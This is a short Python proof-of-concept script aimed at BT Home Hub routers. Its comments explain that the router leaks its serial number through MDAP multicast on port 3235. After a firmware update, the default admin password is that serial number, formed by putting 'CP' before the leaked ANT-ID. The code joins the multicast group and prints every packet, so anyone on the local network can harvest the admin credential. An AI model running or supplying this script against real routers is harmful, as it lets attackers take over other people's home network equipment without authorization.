#!/usr/bin/python

import socket
import struct

# BT Home Hub leaks its serial number via MDAP ('ANT-ID' parameter)
# S/N is sent to port 3235 on multicast address 224.0.0.103
# which this script listens to

# The latest BT Home Hub firmware upgrade (version 6.2.6.E as time of writing
# introduced a new security feature which changes the default admin password
# from 'admin' to the serial number of the router: http://snipurl.com/28dfh

# However, the S/N is just the ANT ID paramater with 'CP' prepended to it.
# i.e.: if ANT ID is YYWWPPXXX then the S/N would be CPYYWWPPXXX
 
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 3235))
mreq = struct.pack("4sl", socket.inet_aton("224.0.0.103"), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
while True:
	print sock.recv(10240)